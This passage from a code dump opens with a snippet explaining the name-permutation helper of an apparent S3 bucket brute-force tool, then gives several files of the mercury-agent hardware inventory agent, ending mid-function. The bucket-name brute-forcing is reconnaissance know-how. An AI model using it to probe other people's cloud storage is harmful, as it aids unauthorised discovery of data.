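The brute-force mode above is driven entirely by `wordMixing`, which joins the target and each wordlist entry in four permutations before the HEAD probes. A minimal standalone sketch of that behaviour (the target/word pair is made up for illustration):
```python
def wordMixing(target, word):
    # Same permutation logic as s3cruze.py: concatenated and hyphenated,
    # in both orders.
    wordList = ["{0}{1}".format(target, word)]
    wordList.append("{0}-{1}".format(target, word))
    wordList.append("{1}-{0}".format(target, word))
    wordList.append("{1}{0}".format(target, word))
    return wordList

print(wordMixing("example", "backup"))
# ['examplebackup', 'example-backup', 'backup-example', 'backupexample']
```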
{
"source": "jr0d/mercury-agent",
"score": 2
} |
#### File: mercury-agent/mercury_agent/backend_client.py
```python
from mercury_agent.configuration import get_configuration
from mercury.common.clients.rpc.backend import BackEndClient
# Private
__backend_client = None
def get_backend_client():
# TODO: Trying this out, 0mq says it is ok
global __backend_client
if not __backend_client:
__backend_client = BackEndClient(
get_configuration().agent.remote.backend_url)
return __backend_client
```
#### File: mercury-agent/mercury_agent/capabilities.py
```python
import logging
LOG = logging.getLogger(__name__)
runtime_capabilities = {}
def add_capability(entry, name, description, doc=None, serial=False,
num_args=None, kwarg_names=None, no_return=False,
dependency_callback=None, timeout=1800,
task_id_kwargs=False):
"""Add a new capability to the runtime capabilities.
    :param entry: The callable that implements the capability.
:param name: Name of the new capability.
:param description: Description of the new capability.
:param doc: Function docstring.
:param serial: Boolean indication if the task is serial.
:param num_args: Number of expected arguments.
:param kwarg_names: Named arguments.
:param no_return: True if the task doesn't return any value.
:param dependency_callback: Callback to check dependency.
:param timeout: Timeout for the new capability.
:param task_id_kwargs: Whether to put task_id in kwargs.
"""
LOG.info('Adding capability %s' % name)
runtime_capabilities[name] = {
'name': name,
'entry': entry,
'description': description,
'doc': doc,
'serial': serial,
'num_args': num_args,
'kwarg_names': kwarg_names,
'no_return': no_return,
'dependency_callback': dependency_callback,
'timeout': timeout,
'task_id_kwargs': task_id_kwargs
}
def capability(name, description, serial=False, num_args=None,
kwarg_names=None, no_return=False,
dependency_callback=None, timeout=1800, task_id_kwargs=False):
"""Decorator to add a new capability.
:param name: Name of the new capability.
:param description: Description of the new capability.
:param serial: Boolean indication if the task is serial.
:param num_args: Number of expected arguments.
:param kwarg_names: Named arguments.
:param no_return: True if the task doesn't return any value.
:param dependency_callback: Callback to check dependency.
:param timeout: Timeout for the new capability.
:param task_id_kwargs: Whether to put task_id in kwargs.
"""
def wrap(entry):
add_capability(entry, name, description, doc=entry.__doc__,
serial=serial, num_args=num_args,
kwarg_names=kwarg_names, no_return=no_return,
dependency_callback=dependency_callback,
timeout=timeout, task_id_kwargs=task_id_kwargs)
return entry
return wrap
```
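A minimal sketch of how an agent module would register itself through this decorator, assuming `mercury_agent.capabilities` is importable as it is elsewhere in the repository; `say_hello` and its metadata are invented for illustration:
```python
from mercury_agent.capabilities import capability, runtime_capabilities

@capability('say_hello', description='Return a greeting', num_args=1)
def say_hello(name):
    """Return a greeting for the given name."""
    return 'Hello, {}'.format(name)

# The decorator returns the original callable and records it in the registry
# along with the defaults (timeout=1800, serial=False, and so on).
assert say_hello('world') == 'Hello, world'
assert runtime_capabilities['say_hello']['entry'] is say_hello
assert runtime_capabilities['say_hello']['timeout'] == 1800
```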
#### File: hardware/general/mcelog.py
```python
from mercury.common.exceptions import MercuryGeneralException
from mercury.common.helpers import cli
HWEVENT_SEARCH_TERM = 'Hardware event. This is not a software error.'
JOURNALCTL_COMMAND = 'journalctl -a --output cat --unit=mcelog.service ' \
'--no-pager'
def get_mcelog_journal_stream():
p = cli.run(JOURNALCTL_COMMAND, raw=True)
if p.returncode:
raise MercuryGeneralException('Error getting mcelog')
return p.stdout
def query_mcelog_daemon(mcelog_path='mcelog'):
"""
Used to expose memory error counts
:param mcelog_path:
:return:
"""
mcelog = cli.find_in_path(mcelog_path)
if not mcelog:
raise MercuryGeneralException('Could not find mcelog')
result = cli.run(f'{mcelog} --client', raise_exception=False)
return result.stdout
def count_logged_events():
"""
    Scans the mcelog journal stream and returns the number of lines
    containing HWEVENT_SEARCH_TERM
    :return: count of matching hardware event lines
"""
count = 0
for line in get_mcelog_journal_stream().readlines():
if HWEVENT_SEARCH_TERM in line.decode('utf-8'):
count += 1
return count
if __name__ == '__main__':
print(count_logged_events())
```
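The counting step only needs a file-like byte stream that yields journal lines, so the logic can be exercised without `journalctl`; a sketch under that assumption, using a fabricated two-line log:
```python
import io

HWEVENT_SEARCH_TERM = 'Hardware event. This is not a software error.'

def count_events_in_stream(stream):
    # Same scan as count_logged_events(), but over any byte stream.
    count = 0
    for line in stream.readlines():
        if HWEVENT_SEARCH_TERM in line.decode('utf-8'):
            count += 1
    return count

fake_journal = io.BytesIO(
    b'Hardware event. This is not a software error.\n'
    b'mcelog: started\n'
)
print(count_events_in_stream(fake_journal))  # 1
```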
#### File: oem/dell/om_xml_deserializer.py
```python
from io import BytesIO
from lxml import etree
class XMLError(Exception):
pass
class XLoader(object):
def __init__(self, xml_data):
self.xml_data = xml_data
@property
def root(self):
return etree.parse(BytesIO(self.xml_data)).getroot()
class XMLAbout(dict):
def __init__(self, oma):
super(XMLAbout, self).__init__()
about = oma.find('About')
if about is None:
raise XMLError('About element is missing.')
self['components'] = list()
for child in about:
if child.tag == 'Component':
self._add_component(child)
else:
self[child.tag] = child.text.strip()
def _add_component(self, component):
d = dict()
for child in component:
d[child.tag] = child.text.strip()
self['components'].append(d)
class XMLChassisStatus(dict):
status_translation = {
1: "Unknown",
2: "Ok",
3: "Non-critical",
4: "Critical"
}
# triple (tag, object list tag, description)
element_list = [
('intrusion', 'IntrusionObj', 'IntrusionLoc'),
('voltages', 'VoltageObj', 'ProbeLocation'),
('temperatures', 'TemperatureObj', 'ProbeLocation'),
('fans', 'Redundancy', 'Fan System'),
('currents', 'CurrentObj', 'ProbeLocation'),
('powersupply', 'PowerSupplyObj', 'PSLocation'),
('powermonitoring', 'PowerConsumptionDataObj', 'Identifier'),
('processor', 'DevProcessorObj', 'Brand'),
('esmlog', 'LogObj', 'HardwareLog'),
('memory', 'MemDevObj', 'Memory'),
('batteries', 'BatteryObj', 'ProbeLocation'),
('sdcard', 'SDCard', 'SDCardLocation')
]
computed_status_tag = 'computedobjstatus'
objstatus_tag = 'objstatus'
def __init__(self, root):
super(XMLChassisStatus, self).__init__()
parent = root[0]
for tag, obj, obj_desc in self.element_list:
element = parent.find(tag)
if element is None:
continue
self[tag] = dict()
status_element = element.find(self.computed_status_tag)
self[tag]['status'] = int(status_element.text.strip())
self[tag]['status_string'] = status_element.attrib.get('strval')
self[tag]['sensors'] = list()
sensor_elements = element.findall(obj)
for sensor_element in sensor_elements:
sensor_dict = dict()
description_element = sensor_element.find(obj_desc)
if description_element is not None:
sensor_dict['description'] = description_element.text
else:
sensor_dict['description'] = obj_desc
sensor_dict['status'] = sensor_element.find(self.objstatus_tag).text
self[tag]['sensors'].append(sensor_dict)
@property
def errors(self):
err = list()
for tag in self:
if self[tag]['status'] == 2:
continue
error_dict = self[tag]
error_dict['component'] = tag
err.append(error_dict)
return err
class XMLVDisk(dict):
vdisk_obj_tag = 'DCStorageObject'
def __init__(self, oma):
super(XMLVDisk, self).__init__()
vdisk_element = oma.find('VirtualDisks')
if vdisk_element is None:
return
obj_elements = vdisk_element.findall(self.vdisk_obj_tag)
for obj in obj_elements:
device_id = int(obj.find('DeviceID').text)
self[device_id] = dict()
self[device_id]['status'] = int(obj.find('ObjStatus').text)
self[device_id]['state'] = int(obj.find('ObjState').text)
self[device_id]['read_policy'] = int(obj.find('DefaultReadPolicy').text)
self[device_id]['write_policy'] = int(obj.find('DefaultWritePolicy').text)
self[device_id]['name'] = obj.find('Name').text
class XMLController(dict):
controller_obj_tag = 'DCStorageObject'
def __init__(self, oma):
super(XMLController, self).__init__()
controller_element = oma.find('Controllers')
if controller_element is None:
return
        # TODO: See what multiple controllers look like
obj_element = controller_element.find(self.controller_obj_tag)
self['name'] = obj_element.find('Name').text
self['status'] = int(obj_element.find('ObjStatus').text)
self['state'] = int(obj_element.find('ObjState').text)
class XMLPDisk(dict):
pdisk_obj_tag = 'DCStorageObject'
def __init__(self, oma):
super(XMLPDisk, self).__init__()
pdisk_element = oma.find('ArrayDisks')
obj_elements = pdisk_element.findall(self.pdisk_obj_tag)
for obj in obj_elements:
device_id = int(obj.find('DeviceID').text)
self[device_id] = dict()
self[device_id]['status'] = int(obj.find('ObjStatus').text)
self[device_id]['state'] = int(obj.find('ObjState').text)
self[device_id]['vendor'] = obj.find('Vendor').text
```
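A sketch of how `XLoader` and `XMLChassisStatus` fit together, assuming the module is importable at the path implied by the file layout; the XML payload below is hand-built to mimic the element names the parser expects and is not real OMSA output:
```python
from mercury_agent.hardware.oem.dell.om_xml_deserializer import (
    XLoader, XMLChassisStatus)

sample = b"""
<OMA>
  <Chassis>
    <intrusion>
      <computedobjstatus strval="Ok">2</computedobjstatus>
      <IntrusionObj>
        <IntrusionLoc>Main chassis</IntrusionLoc>
        <objstatus>2</objstatus>
      </IntrusionObj>
    </intrusion>
  </Chassis>
</OMA>
"""

root = XLoader(sample).root
status = XMLChassisStatus(root)
print(status['intrusion']['status_string'])  # Ok
print(status.errors)                         # [] because status 2 means "Ok"
```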
#### File: oem/hp/hpasmcli.py
```python
import re
from mercury.common.helpers import cli
invalid_characters = '.$ /\\\\'
class HPAsmException(Exception):
pass
class HPASMCLI:
def __init__(self, hpasmcli_path='hpasmcli'):
"""
A class interface for the hpasmcli utility
:param hpasmcli_path:
"""
self.hpasmcli = cli.find_in_path(hpasmcli_path)
if not self.hpasmcli:
raise HPAsmException('Could not find hpasmcli binary')
@staticmethod
def fix_key_names(data):
        rgx = re.compile('[{}]'.format(invalid_characters))
        return rgx.sub('_', data.strip(invalid_characters).lower())
@staticmethod
def convert_digit(data):
return int(data) if data.isdigit() else data
def hpasm_run(self, command):
result = cli.run('{} -s \'{}\''.format(self.hpasmcli, command))
if result.returncode:
raise HPAsmException('Error running command: {}'.format(command))
return result
def show_server(self):
"""
Data is probably formatted like so:
System : ProLiant DL380 Gen9
Serial No. : TC51NR9952
ROM version : v2.60 (05/21/2018) P89
UEFI Support : Yes
iLo present : Yes
Embedded NICs : 8
NIC1 MAC: 38:63:bb:3f:4b:f4
NIC2 MAC: 38:63:bb:3f:4b:f5
NIC3 MAC: 38:63:bb:3f:4b:f6
NIC4 MAC: 38:63:bb:3f:4b:f7
NIC5 MAC: 8c:dc:d4:ad:d6:d0
NIC6 MAC: 8c:dc:d4:ad:d6:d1
NIC7 MAC: 68:05:ca:39:89:a0
NIC8 MAC: 68:05:ca:39:89:a1
Processor: 0
Name : Intel(R) Xeon(R) CPU E5-2630 v3 @ 2.40GHz
Stepping : 2
Speed : 2400 MHz
Bus : 100 MHz
Core : 8
Thread : 16
Socket : 1
Level1 Cache : 512 KBytes
Level2 Cache : 2048 KBytes
Level3 Cache : 20480 KBytes
Status : Ok
Processor: 1
Name : Intel(R) Xeon(R) CPU E5-2630 v3 @ 2.40GHz
Stepping : 2
Speed : 2400 MHz
Bus : 100 MHz
Core : 8
Thread : 16
Socket : 2
Level1 Cache : 512 KBytes
Level2 Cache : 2048 KBytes
Level3 Cache : 20480 KBytes
Status : Ok
Processor total : 2
Memory installed : 131072 MBytes
ECC supported : Yes
"""
data = self.hpasm_run('SHOW SERVER')
details = {}
embedded_nics_context = False
processor_context = False
processor_index = -1
for line in [_ for _ in data.splitlines() if _]:
label, value = (_.strip() for _ in line.split(':', 1))
label = self.fix_key_names(label)
value = self.convert_digit(value)
if embedded_nics_context or processor_context:
if line[0] != '\t':
embedded_nics_context = processor_context = False
if label == 'embedded_nics':
details[label] = {'count': int(value), 'nics': []}
embedded_nics_context = True
elif label == 'processor':
processor_context = True
processor_index = value
if processor_index == 0:
details['processors'] = [{}]
else:
details['processors'].append({})
elif embedded_nics_context:
details['embedded_nics']['nics'].append({label: value})
elif processor_context:
details['processors'][processor_index][label] = value
else:
details[label] = value
return details
def show_dimm(self):
"""
Example output:
DIMM Configuration
------------------
Processor #: 1
Module #: 1
Present: Yes
Form Factor: 9h
Memory Type: DDR4(1ah)
Size: 16384 MB
Speed: 2133 MHz
Supports Lock Step: No
Configured for Lock Step: No
Status: Ok
Processor #: 1
Module #: 4
Present: Yes
Form Factor: 9h
Memory Type: DDR4(1ah)
Size: 16384 MB
Speed: 2133 MHz
Supports Lock Step: No
Configured for Lock Step: No
Status: Ok
Processor #: 1
Module #: 9
Present: Yes
Form Factor: 9h
Memory Type: DDR4(1ah)
Size: 16384 MB
Speed: 2133 MHz
Supports Lock Step: No
Configured for Lock Step: No
Status: Ok
Processor #: 1
Module #: 12
Present: Yes
Form Factor: 9h
Memory Type: DDR4(1ah)
Size: 16384 MB
Speed: 2133 MHz
Supports Lock Step: No
Configured for Lock Step: No
Status: Ok
Processor #: 2
Module #: 1
Present: Yes
Form Factor: 9h
Memory Type: DDR4(1ah)
Size: 16384 MB
Speed: 2133 MHz
Supports Lock Step: No
Configured for Lock Step: No
Status: Ok
Processor #: 2
Module #: 4
Present: Yes
Form Factor: 9h
Memory Type: DDR4(1ah)
Size: 16384 MB
Speed: 2133 MHz
Supports Lock Step: No
Configured for Lock Step: No
Status: Ok
Processor #: 2
Module #: 9
Present: Yes
Form Factor: 9h
Memory Type: DDR4(1ah)
Size: 16384 MB
Speed: 2133 MHz
Supports Lock Step: No
Configured for Lock Step: No
Status: Ok
Processor #: 2
Module #: 12
Present: Yes
Form Factor: 9h
Memory Type: DDR4(1ah)
Size: 16384 MB
Speed: 2133 MHz
Supports Lock Step: No
Configured for Lock Step: No
Status: Ok
"""
data = self.hpasm_run('SHOW DIMM')
# Knocks off the first three lines then splits on double \n
segments = '\n'.join(data.splitlines()[3:]).split("\n\n")
details = []
for segment in segments:
if segment:
dimm_info = {}
details.append(dimm_info)
for line in segment.splitlines():
key, value = (_.strip() for _ in line.split(':', 1))
dimm_info[self.fix_key_names(key)] = self.convert_digit(value)
return details
def show_powersupply(self):
data = self.hpasm_run('SHOW POWERSUPPLY')
power_supplies = []
ps_data = {}
for line in [_ for _ in data.splitlines() if _]:
if 'Power supply' in line:
if ps_data:
power_supplies.append(ps_data)
ps_data = {}
continue
key, value = (_.strip() for _ in line.split(':', 1))
ps_data[self.fix_key_names(key)] = value
power_supplies.append(ps_data)
return power_supplies
def clear_iml(self):
return self.hpasm_run('CLEAR IML')
```
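The label normalisation used throughout the parser is easiest to see in isolation; the static helpers need no `hpasmcli` binary, so a quick sketch (import path matches the unit tests further below, assuming the package and its dependencies are installed):
```python
from mercury_agent.hardware.oem.hp.hpasmcli import HPASMCLI

# fix_key_names() lower-cases a label and replaces '.', '$', spaces, '/' and
# backslashes with underscores; convert_digit() turns numeric strings to ints.
print(HPASMCLI.fix_key_names('Serial No.'))   # serial_no
print(HPASMCLI.fix_key_names('ROM version'))  # rom_version
print(HPASMCLI.convert_digit('2400'))         # 2400 (int)
print(HPASMCLI.convert_digit('2400 MHz'))     # '2400 MHz' (unchanged)
```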
#### File: inspector/hwlib/cpuinfo.py
```python
import os
def build_index(l, key):
our_dict = dict()
for d in l:
if key not in d:
continue
idx = d[key]
if idx in our_dict:
our_dict[idx].append(d)
else:
our_dict[idx] = [d]
return our_dict
def get_cpufreq_info(cpu):
sys_cpu_path = '/sys/devices/system/cpu/cpu%s/cpufreq' % str(cpu)
if not os.path.exists(sys_cpu_path):
return dict()
def read(path):
with open(path) as fp:
return int(fp.read().strip())
freq = dict()
freq['min'] = read(os.path.join(sys_cpu_path, 'scaling_min_freq'))
freq['max'] = read(os.path.join(sys_cpu_path, 'scaling_max_freq'))
freq['cur'] = read(os.path.join(sys_cpu_path, 'scaling_cur_freq'))
return freq
class CPUInfo(object):
def __init__(self):
if not os.path.exists('/proc/cpuinfo'):
raise OSError('/proc/cpuinfo is missing. Bro, do you even linux?')
with open('/proc/cpuinfo') as fp:
self.raw_cpuinfo = fp.read()
cores = self.raw_cpuinfo.split('\n\n')
self.core_dicts = list()
for core in cores:
if not core:
continue
core_dict = dict()
for attribute in core.splitlines():
if not attribute:
continue
k, v = attribute.split(':')
fixed_key = k.strip().replace(' ', '_').lower()
stripped_value = v.strip()
if fixed_key in ['processor', 'physical_id', 'core_id', 'cpu_cores']:
stripped_value = int(stripped_value)
core_dict[fixed_key] = stripped_value
self.core_dicts.append(core_dict)
self.core_dicts.sort(key=lambda d: d['processor'])
@property
def physical_index(self):
return build_index(self.core_dicts, 'physical_id')
@property
def logical_processor_index(self):
return build_index(self.core_dicts, 'processor')
@property
def processor_ids(self):
return [core_dict['processor'] for core_dict in self.core_dicts]
@property
def physical_processor_count(self):
return len(self.physical_index)
@property
def logical_core_count(self):
# AKA, threads (HTT)
return len(self.core_dicts)
@property
def total_physical_core_count(self):
# We assume that multi socket systems will be using the same proc
return self.cores_per_processor * self.physical_processor_count
def get_cores(self, physical_id):
return self.physical_index.get(physical_id)
@property
def cores_per_processor(self):
return self.one_core.get('cpu_cores')
@property
def core_zero_index(self):
physical_index = self.physical_index
for physical_id in physical_index:
physical_index[physical_id] = physical_index[physical_id][0]
return physical_index
@staticmethod
def get_speed_info(core_dict):
speed_info = dict()
processor_id = int(core_dict['processor'])
speed_info['model_name'] = core_dict['model_name']
cpufreq = get_cpufreq_info(processor_id)
cpufreq_enabled = bool(cpufreq) or False
speed_info['bogomips'] = float(core_dict['bogomips'])
speed_info['cpufreq_enabled'] = cpufreq_enabled
if cpufreq_enabled:
speed_info['current'] = float(cpufreq['cur'])
speed_info['min'] = float(cpufreq['min'])
speed_info['max'] = float(cpufreq['max'])
else:
cpu_speed = core_dict['cpu_mhz']
speed_info['current'] = float(cpu_speed)
speed_info['min'] = float(cpu_speed)
speed_info['max'] = float(cpu_speed)
return speed_info
def get_physical_speed_info(self):
speed_info = list()
zero_index = self.core_zero_index
for physical_processor in zero_index:
core_dict = zero_index[physical_processor]
speed_info.append(self.get_speed_info(core_dict))
return speed_info
@property
def one_core(self):
return self.core_dicts and self.core_dicts[0] or dict()
```
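`build_index` is the grouping helper behind the physical and logical indexes above; a short sketch with invented core records (module path inferred from the file layout, as with the other hwlib modules):
```python
from mercury_agent.inspector.hwlib.cpuinfo import build_index

# Three logical processors spread across two physical packages.
cores = [
    {'processor': 0, 'physical_id': 0},
    {'processor': 1, 'physical_id': 0},
    {'processor': 2, 'physical_id': 1},
]
index = build_index(cores, 'physical_id')
print(sorted(index))                           # [0, 1]
print([len(index[k]) for k in sorted(index)])  # [2, 1]
```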
#### File: inspector/hwlib/lspci.py
```python
import shlex
import six
import subprocess
# Class codes used by lspci.
ETHERNET_CONTROLLER = '0200'
NETWORK_CONTROLLER = '0280'
FIBRE_CHANNEL = '0c04'
RAID_CONTROLLER = '0104'
# TODO: Move to mercury.common.exceptions
class LSPCIError(Exception):
"""Raised when something goes wrong related to the `lspci` command."""
pass
def lspci_run(arguments='-mm'):
"""Runs lspci and returns the output.
:param arguments: Arguments you want to pass to lspci default = '-mm'
:return: stdout from lspci command
:except: LSPCIException on non-zero return code
"""
cmd = shlex.split('lspci ' + arguments)
sub_proc = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out, err = sub_proc.communicate()
if sub_proc.returncode:
raise LSPCIError('[%d] %s' % (sub_proc.returncode, err))
if isinstance(out, six.binary_type):
# noinspection PyUnresolvedReferences
out = out.decode('utf-8')
return out
def _get_lspci_id(line):
"""Read a hex ID of the form [nnnn] from an `lspci` line.
Gets an id from a line that looks like this:
Intel Corporation [8086]
where 8086 is the id
It should also work if something like this happens:
    2nd Generation Core Processor Family DRAM [not_an_id] Controller [0104]
:param line: A string representing a line of lspci output.
:return: A string representing the ID.
"""
hush = line.split('[')
return hush[-1].strip(']')
def _get_lspci_name(line):
"""Reads and returns a 'name' from a line of `lspci` output."""
hush = line.split('[')
return '['.join(hush[0:-1]).strip()
def parse_nnvmmk():
"""
Runs lspci -nnvmmk and parses the output into a list of dictionaries.
:return: a list of dicts with the following keys
slot
vendor_name
device_name
svendor_name
sdevice_name
vendor_id
device_id
svendor_id
sdevice_id
revision
progif
driver
:except:
"""
out = lspci_run('-nnvmmk')
pcibus = list()
blocks = out.split('\n\n')
for block in blocks:
device = dict()
for element in block.splitlines():
split_element = element.split(':')
key = split_element[0]
data = ':'.join(split_element[1:]).strip()
if key in ('Slot', 'ProgIf', 'Driver'):
device[key.lower()] = data
continue
if key in ('Class', 'Vendor', 'Device', 'SVendor', 'SDevice'):
key_prefix = key.lower()
device[key_prefix + '_name'] = _get_lspci_name(data)
device[key_prefix + '_id'] = _get_lspci_id(data)
continue
if key == 'Rev':
device['revision'] = data
continue
if not device:
continue
pcibus.append(device)
return pcibus
class PCIDevice(dict):
"""Represents information about a PCI Device as returned by `lspci`."""
def __init__(self,
slot=None,
class_id=None,
vendor_id=None,
device_id=None,
class_name='',
vendor_name='',
device_name='',
svendor_name=None,
svendor_id=None,
sdevice_name=None,
sdevice_id=None,
revision=None,
progif=None,
driver=None):
"""Create a PCIDevice. Checks for a few required fields."""
if None in [slot, class_id, vendor_id, device_id]:
raise LSPCIError(
'slot, class_id, vendor_id, and device_id are required.')
super(PCIDevice, self).__init__()
self.slot = slot
self.class_id = class_id
self.vendor_id = vendor_id
self.device_id = device_id
self.class_name = class_name
self.vendor_name = vendor_name
self.device_name = device_name
self.svendor_name = svendor_name
self.svendor_id = svendor_id
self.sdevice_name = sdevice_name
self.sdevice_id = sdevice_id
self.revision = revision
self.progif = progif
self.driver = driver
def __getattr__(self, key):
try:
return self[key]
except (KeyError, AttributeError):
return None
def __setattr__(self, key, value):
self[key] = value
class PCIBus(list):
def __init__(self, sudo=False):
super(PCIBus, self).__init__()
for it in parse_nnvmmk():
self.append(PCIDevice(**it))
def get_devices_by_class(self, class_id):
sub_li = list()
for device in self:
if device.get('class_id') == class_id:
sub_li.append(device)
return sub_li
def has_device_class(self, class_id):
for device in self:
if device.get('class_id') == class_id:
return True
return False
def get_devices_by_vendor(self, vendor_id):
sub_li = list()
for device in self:
if device.get('vendor_id') == vendor_id:
sub_li.append(device)
return sub_li
def get_fibre_channel_devices(self):
return self.get_devices_by_class(FIBRE_CHANNEL)
def has_fibre_channel(self):
return self.has_device_class(FIBRE_CHANNEL)
def get_ethernet_devices(self):
return self.get_devices_by_class(ETHERNET_CONTROLLER)
def has_ethernet(self):
return self.has_device_class(ETHERNET_CONTROLLER)
def get_network_devices(self):
return self.get_devices_by_class(NETWORK_CONTROLLER)
def has_network(self):
return self.has_device_class(NETWORK_CONTROLLER)
def get_raid_bus_controller_devices(self):
return self.get_devices_by_class(RAID_CONTROLLER)
def has_raid_bus_controller(self):
return self.has_device_class(RAID_CONTROLLER)
```
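The two bracket helpers carry the whole `-nnvmmk` parse; a quick sketch of what they extract from a single lspci field (the module path is the one used by the unit tests later in this document):
```python
from mercury_agent.inspector.hwlib.lspci import _get_lspci_id, _get_lspci_name

field = 'Intel Corporation [8086]'
print(_get_lspci_id(field))    # 8086
print(_get_lspci_name(field))  # Intel Corporation

# Brackets inside the name are tolerated; only the trailing [....] is the ID.
tricky = 'Core Processor Family DRAM [not_an_id] Controller [0104]'
print(_get_lspci_id(tricky))   # 0104
```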
#### File: inspector/hwlib/mercury_id.py
```python
import hashlib
import logging
from mercury.common.exceptions import MercuryIdException
LOG = logging.getLogger(__name__)
META_TYPE_MAC = '00'
META_TYPE_PRODUCT_UUID = '01'
META_TYPE_CHASSIS_ASSET_SERIAL = '02'
META_TYPE_BOARD_ASSET_SERIAL = '03'
def _build_hash(target, meta_type):
digest = hashlib.sha1(target).hexdigest()
return meta_type + digest
def get_embedded(inspected_interfaces):
embedded_interfaces = []
for interface in inspected_interfaces:
_biosdevname = interface['predictable_names'].get('biosdevname', '')
if _biosdevname:
if 'em' in _biosdevname:
embedded_interfaces.append(interface)
return embedded_interfaces
# methods
def dmi_methods(dmi):
product_uuid = dmi.get('product_uuid')
chassis_asset_tag = dmi.get('chassis_asset_tag')
chassis_serial = dmi.get('chassis_serial')
board_asset_tag = dmi.get('board_asset_tag')
board_serial = dmi.get('board_serial')
disqualify = 'To Be Filled By O.E.M.'
if product_uuid:
LOG.debug('Generating mercury ID using product_uuid: %s' % product_uuid)
return _build_hash(product_uuid, META_TYPE_PRODUCT_UUID)
if disqualify in [chassis_asset_tag, chassis_serial, board_asset_tag, board_serial]:
LOG.debug('Junk in DMI tables: \'%s\'' % disqualify)
return
if chassis_asset_tag and chassis_serial:
LOG.debug('Generating mercury ID using chassis asset information: tag=%s, asset=%s' % (
chassis_asset_tag, chassis_serial))
return _build_hash(chassis_asset_tag + chassis_serial, META_TYPE_CHASSIS_ASSET_SERIAL)
if board_asset_tag and board_serial:
LOG.debug('Generating mercury ID using board asset information: tag=%s, asset=%s' % (
board_asset_tag, board_serial))
return _build_hash(board_asset_tag + board_serial, META_TYPE_BOARD_ASSET_SERIAL)
def generate_mercury_id(inspected_dmi, inspected_interfaces):
mercury_id = dmi_methods(inspected_dmi)
if mercury_id:
return mercury_id
else:
meta_type = META_TYPE_MAC
embedded = get_embedded(inspected_interfaces)
if embedded:
LOG.debug('Generating mercury ID using embedded interfaces ')
inspected_interfaces = embedded
else:
LOG.debug('Generating mercury ID using all interfaces')
target = ''
for interface in inspected_interfaces:
address = interface.get('address') # mac address
if address:
target += address
if not target:
raise MercuryIdException('Could not generate MercuryId')
return _build_hash(target, meta_type)
if __name__ == '__main__':
logging.basicConfig(level=logging.DEBUG)
from mercury_agent.inspector.inspectors.dmi import dmi_inspector
from mercury_agent.inspector.inspectors.interfaces import interface_inspector
_dmi = dmi_inspector()
_interfaces = interface_inspector()
print(generate_mercury_id(_dmi, _interfaces))
```
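Before falling back to MAC addresses, `generate_mercury_id` narrows the interface list with `get_embedded`, which keeps only interfaces that biosdevname reports as embedded (`em*`). A sketch with fabricated interface records, assuming the package is importable at the path implied by the file layout:
```python
from mercury_agent.inspector.hwlib.mercury_id import get_embedded

interfaces = [
    {'address': 'aa:bb:cc:dd:ee:01', 'predictable_names': {'biosdevname': 'em1'}},
    {'address': 'aa:bb:cc:dd:ee:02', 'predictable_names': {'biosdevname': 'p1p1'}},
    {'address': 'aa:bb:cc:dd:ee:03', 'predictable_names': {}},
]
embedded = get_embedded(interfaces)
print([i['address'] for i in embedded])  # ['aa:bb:cc:dd:ee:01']
```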
#### File: inspector/inspectors/agent_info.py
```python
import pkg_resources
from mercury_agent.inspector.inspectors import expose
@expose('agent_info')
def agent_inspector():
_info = {
'agent_version':
pkg_resources.get_distribution('mercury-agent').version,
'mercury_version':
pkg_resources.get_distribution('mercury-core').version,
}
try:
with open('/etc/hostname') as fp:
hostname = fp.read().strip()
except (IOError, OSError):
hostname = None
_info['hostname'] = hostname
return _info
if __name__ == '__main__':
from pprint import pprint
pprint(agent_inspector())
```
#### File: inspector/inspectors/inspector.py
```python
import logging
import sys
import traceback
log = logging.getLogger(__name__)
inspectors = []
late_inspectors = []
async_inspectors = []
# TODO: Consider manifest driven inspector orchestration
def run_inspector(name, f, *args, **kwargs):
# noinspection PyBroadException
try:
log.debug('Running inspector: %s' % name)
return f(*args, **kwargs)
except Exception:
exc_type, exc_value, exc_traceback = sys.exc_info()
path, line, scope, code = traceback.extract_tb(exc_traceback)[-1]
log.error('Inspector raised an unhandled exception (%s : %s): name=%s, scope=%s, '
'path=%s, line=%d, code=%s' % (exc_type,
exc_value,
name,
scope,
path,
line,
code))
return None
def expose(name):
def wrap(f):
def wrapped_f(*args, **kwargs):
return run_inspector(name, f, *args, **kwargs)
log.debug('Adding runtime inspector %s (%s)' % (f.__name__, name))
wrapped_f.__name__ = f.__name__
wrapped_f.__doc__ = f.__doc__
inspectors.append((name, wrapped_f))
return wrapped_f
return wrap
def expose_late(name, run_if=None):
"""Hardware dependent inspectors, such as those dependent on OEM/ODM utilities
:param run_if: callback funtion that takes device_info as an argument. This is optional,
run_if can always be added by other means
"""
def wrap(f):
def wrapped_f(early_device_info):
if hasattr(f, 'run_if') and not f.run_if(early_device_info):
log.info('Requirement not satisfied for %s (%s)' % (f.__name__, name))
return None
return run_inspector(name, f, early_device_info)
log.debug('Adding late inspector %s (%s)' % (f.__name__, name))
wrapped_f.__name__ = f.__name__
wrapped_f.__doc__ = f.__doc__
if run_if:
wrapped_f.run_if = run_if
late_inspectors.append((name, wrapped_f))
return wrapped_f
return wrap
```
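A sketch of the registration pattern from the consumer side, with the module path inferred from the file layout; the inspector body here is invented purely to show what `expose` does:
```python
from mercury_agent.inspector.inspectors.inspector import expose, inspectors

@expose('toy')
def toy_inspector():
    """A do-nothing inspector used only to illustrate registration."""
    return {'ok': True}

# The wrapper is what lands in the registry; exceptions raised inside it are
# logged by run_inspector() and come back as None instead of propagating.
print(('toy', toy_inspector) in inspectors)  # True
print(toy_inspector())                       # {'ok': True}
```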
#### File: inspector/inspectors/raid.py
```python
import logging
from mercury_agent.hardware.drivers import get_subsystem_drivers
from mercury_agent.inspector.inspectors import expose_late
log = logging.getLogger(__name__)
# noinspection PyUnusedLocal
@expose_late('raid')
def raid_inspector(device_info):
drivers = get_subsystem_drivers('raid')
if not drivers:
return
_inspected = list()
for driver in drivers:
log.info('Running RAID inspector %s' % driver.name)
data = driver.inspect()
if isinstance(data, list):
_inspected += data
else:
_inspected.append(data)
return _inspected
```
#### File: mercury_agent/procedures/inspector.py
```python
from mercury_agent.capabilities import capability
from mercury_agent.configuration import get_configuration
from mercury_agent.inspector import inspect
from mercury_agent.inspector.inspect import global_device_info
from mercury_agent.inspector.inspectors import health
@capability('inspector', description='Run inspector')
def inspector():
"""
Manually run inspectors
:return: results
"""
return inspect.inspect()
@capability('check_hardware', description='Check hardware for errors')
def check_hardware():
"""
Checks hardware for inconsistencies and defects. Returns a list of discovered critical errors.
:return:
"""
